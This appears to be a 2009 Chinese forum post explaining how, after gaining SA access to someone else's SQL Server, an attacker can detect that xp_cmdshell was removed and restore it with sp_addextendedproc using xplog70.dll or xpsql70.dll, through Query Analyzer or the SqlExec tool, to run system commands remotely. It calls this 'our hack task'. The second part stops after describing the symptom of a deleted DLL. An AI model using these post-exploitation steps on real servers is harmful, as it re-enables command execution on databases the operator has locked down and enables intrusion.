查看: 5800|回复: 0
打印 上一主题 下一主题

Microsoft SQL Server数据库SA权限总结

[复制链接]
跳转到指定楼层
1#
发表于 2009-1-8 12:24:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
台州网址导航
需要准备的工具:

SQL Query Analyzer和SqlExec Sunx Version  

第一部分:  

去掉xp_cmdshell保护系统的具体分析:

语句如下:

1.去掉xp_cmdshell扩展过程的方法是使用如下语句:

以下为引用的内容:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'



2.添加xp_cmdshell扩展过程的方法是使用如下语句:

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

现在看看现象:

我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。  

现在来看看被去掉xp_cmdshell后恢复的两种方法:  

方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者对Sql2000情况下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version来去除xp_cmdshell的方法和加的时候选择条件一样,然后输入sp_dropextendedproc 'xp_cmdshell'就可以了。

第二部分:  

假如对方已经把xplog70.dll删除或者改了名,我们来用下面的方法继续我们的hack任务:  

当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。  

在查询分析器中写入sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'提示数据库中已存在名为'xp_cmdshell'的对象。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享分享 分享淘帖
台州维博网络(www.tzweb.com)专门运用PHP+MYSQL/ASP.NET+MSSQL技术开发网站门户平台系统等。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

网站推广
关于我们
  • 台州朗动科技(Tzweb.com)拥有多年开发网站平台系统门户手机客户端等业务的成功经验。主要从事:政企网站,系统平台,微信公众号,各类小程序,手机APP客户端,浙里办微应用,浙政钉微应用、主机域名、虚拟空间、后期维护等服务,满足不同企业公司的需求,是台州地区领先的网络技术服务商!

Hi,扫描关注我

Copyright © 2005-2026 站长论坛 All rights reserved

Powered by 站长论坛 with TZWEB Update Techonolgy Support

快速回复 返回顶部 返回列表